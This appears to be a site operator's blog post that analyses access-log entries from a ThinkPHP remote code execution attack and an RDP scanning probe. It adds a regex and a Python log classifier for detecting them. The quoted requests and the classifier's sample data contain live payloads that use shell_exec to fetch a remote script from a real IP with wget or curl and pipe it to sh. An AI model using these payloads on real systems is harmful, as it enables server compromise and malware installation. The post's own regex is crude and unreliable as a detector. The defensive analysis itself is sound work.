\x03\x00\x00*\xE0\x00\x00\x00\x00\x00Cookie mstshash=Administr, an attack targeting the ThinkPHP remote code execution vulnerability
The server was attacked again recently, which is really annoying. Looking through the logs, I found a piece of code I had never seen before: \x03\x00\x00*\xE0\x00\x00\x00\x00\x00Cookie mstshash=Administr
After looking it up online, I found that this is mainly an attack targeting ThinkPHP's remote code execution vulnerability:
1. Request 1:
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20-q%20-O%20-%2082.146.58.234/p2.sh|sh
2. Request 2:
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl%2082.146.58.234/p2.sh|sh
3. Request 3:
\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr
Below is the detailed access log; the last line of the log is that piece of code.
123.125.71.15 - - [14/Dec/2019:20:05:24 +0800] "GET /post-2186.html HTTP/1.1" 200 38754 "-" "Mozilla/5.0 (Linux;u;Android 4.2.2;zh-cn;) AppleWebKit/534.46 (KHTML,like Gecko) Version/5.1 Mobile Safari/10600.6.3 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
111.206.221.67 - - [14/Dec/2019:20:05:26 +0800] "POST /zb_system/cmd.php?act=ajax&src=fastcache_viewnums HTTP/1.1" 200 14 "https://ioozu.com/post-2186.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
101.89.29.86 - - [14/Dec/2019:20:05:27 +0800] "GET /post-2642.html HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36"
176.9.31.80 - - [14/Dec/2019:20:05:27 +0800] "GET /tags-1659.html HTTP/1.1" 200 6483 "-" "serpstatbot/1.0 (advanced backlink tracking bot; curl/7.58.0; http://serpstatbot.com/; abuse@serpstatbot.com)"
106.11.152.228 - - [14/Dec/2019:20:05:29 +0800] "GET /mip/post-2399.html HTTP/1.1" 200 3284 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/56.0.2924.75 Mobile/14E5239e YisouSpider/5.0 Safari/602.1"
176.9.31.80 - - [14/Dec/2019:20:05:31 +0800] "GET /tags-1658.html HTTP/1.1" 200 6399 "-" "serpstatbot/1.0 (advanced backlink tracking bot; curl/7.58.0; http://serpstatbot.com/; abuse@serpstatbot.com)"
61.158.146.103 - - [14/Dec/2019:20:05:33 +0800] "GET /post-2335.html HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Linux; U; Android 9; zh-cn; Redmi Note 8 Pro Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/11.3.6"
61.158.146.103 - - [14/Dec/2019:20:05:33 +0800] "GET /post-2335.html HTTP/1.1" 200 10520 "-" "Mozilla/5.0 (Linux; U; Android 9; zh-cn; Redmi Note 8 Pro Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/11.3.6"
61.158.146.103 - - [14/Dec/2019:20:05:34 +0800] "POST /zb_system/cmd.php?act=ajax&src=fastcache_viewnums HTTP/1.1" 200 35 "https://ioozu.com/post-2335.html" "Mozilla/5.0 (Linux; U; Android 9; zh-cn; Redmi Note 8 Pro Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/11.3.6"
111.206.221.48 - - [14/Dec/2019:20:05:34 +0800] "POST /zb_system/cmd.php?act=ajax&src=fastcache_viewnums HTTP/1.1" 200 14 "https://ioozu.com/post-2186.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
111.192.76.18 - - [14/Dec/2019:20:05:36 +0800] "GET /post-2404.html HTTP/1.1" 200 10237 "https://www.baidu.com/link?url=aDrR5TJzTiGwEtM7iCnGPPsLhLBO7TiMfSMHSQuBpYqUNBF80i9DeFYkH-Yt8VaK&wd=&eqid=cd068e0f000cf714000000025df4d000" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
111.192.76.18 - - [14/Dec/2019:20:05:36 +0800] "POST /zb_system/cmd.php?act=ajax&src=fastcache_viewnums HTTP/1.1" 200 35 "https://ioozu.com/post-2404.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
111.192.76.18 - - [14/Dec/2019:20:05:37 +0800] "GET /favicon.ico HTTP/1.1" 200 1962 "https://ioozu.com/post-2404.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
124.89.232.135 - - [14/Dec/2019:20:05:38 +0800] "GET /u/?url=www.ioozu.com%2Fpost-2335.html HTTP/1.1" 200 159 "https://ioozu.com/u/?url=http%3A%2F%2Fwww.ioozu.com%2Fpost-2335.html" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
124.89.232.135 - - [14/Dec/2019:20:05:40 +0800] "GET /u/?url=https://ioozu.com/ HTTP/1.1" 200 663 "https://ioozu.com/u/?url=www.ioozu.com%2Fpost-2335.html" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
124.89.232.135 - - [14/Dec/2019:20:05:40 +0800] "GET /u/?url=https://ioozu.com/&f=1 HTTP/1.1" 200 347 "https://ioozu.com/u/?url=https://ioozu.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
185.153.199.3 - - [14/Dec/2019:20:05:46 +0800] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 166 "-" "-"
This is an attack targeting the ThinkPHP remote code execution vulnerability; below I wrote a regular expression for this attack.
Regular expression:
(function|exec|sh)$
The remaining cookie one isn't much use, so I won't match it.
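The following is an added example (not the post's own code) that applies the idea above to whole access-log lines instead of a bare regex: it parses the combined-log request field, flags the ThinkPHP invokefunction pattern from requests 1 and 2 and extracts the function and command passed through call_user_func_array, and separately recognises request 3 as an RDP connection-request probe (TPKT header plus the mstshash cookie) rather than an HTTP request. The sample log lines are constructed from the request strings in the post; the source IP 203.0.113.5 and the timestamp of the ThinkPHP line are placeholders.

```python
import re
from urllib.parse import unquote

# Apache/Nginx combined-log prefix: client IP, timestamp and the raw request field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)

# Requests 1 and 2 in the post: ThinkPHP 5.x routes s=/Index/\think\app/invokefunction
# to app::invokefunction, which ends up calling call_user_func_array(vars[0], vars[1]).
THINKPHP_RCE = re.compile(
    r"invokefunction.*?function=call_user_func_array.*?vars\[0\]=(?P<func>\w+)"
    r"(?:.*?vars\[1\]\[\]=(?P<cmd>[^&]*))?",
    re.IGNORECASE,
)

# Request 3 is not HTTP: \x03\x00\x00 is a TPKT header (version 3) and
# "Cookie: mstshash=" is the routing token of an RDP X.224 Connection Request,
# i.e. an RDP scanner talking to the web port. The logger escapes the bytes as \xNN.
RDP_PROBE = re.compile(r"^\\x03\\x00\\x00.*Cookie: mstshash=", re.IGNORECASE)

# Constructed sample lines, built from the request strings shown in the post.
SAMPLE_LOG = [
    r'185.153.199.3 - - [14/Dec/2019:20:05:46 +0800] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 166 "-" "-"',
    r'203.0.113.5 - - [14/Dec/2019:20:06:01 +0800] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20-q%20-O%20-%2082.146.58.234/p2.sh|sh HTTP/1.1" 200 0 "-" "-"',
    r'101.89.29.86 - - [14/Dec/2019:20:05:27 +0800] "GET /post-2642.html HTTP/1.1" 301 178 "-" "Mozilla/5.0"',
]


def classify(line):
    """Return (kind, client_ip, detail) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, req = m.group("ip"), m.group("req")
    if RDP_PROBE.match(req):
        return ("rdp_probe", ip, None)
    parts = req.split(" ")
    # Normal requests are "METHOD path PROTO"; decode %XX so vars[1][] is readable.
    path = unquote(parts[1]) if len(parts) == 3 else unquote(req)
    hit = THINKPHP_RCE.search(path)
    if hit:
        return ("thinkphp_rce", ip, (hit.group("func"), hit.group("cmd")))
    return ("benign", ip, None)


def scan(lines):
    """Everything in the log that is not benign, as (kind, ip, detail) tuples."""
    return [r for r in map(classify, lines) if r and r[0] != "benign"]


if __name__ == "__main__":
    for kind, ip, detail in scan(SAMPLE_LOG):
        print(kind, ip, detail)
```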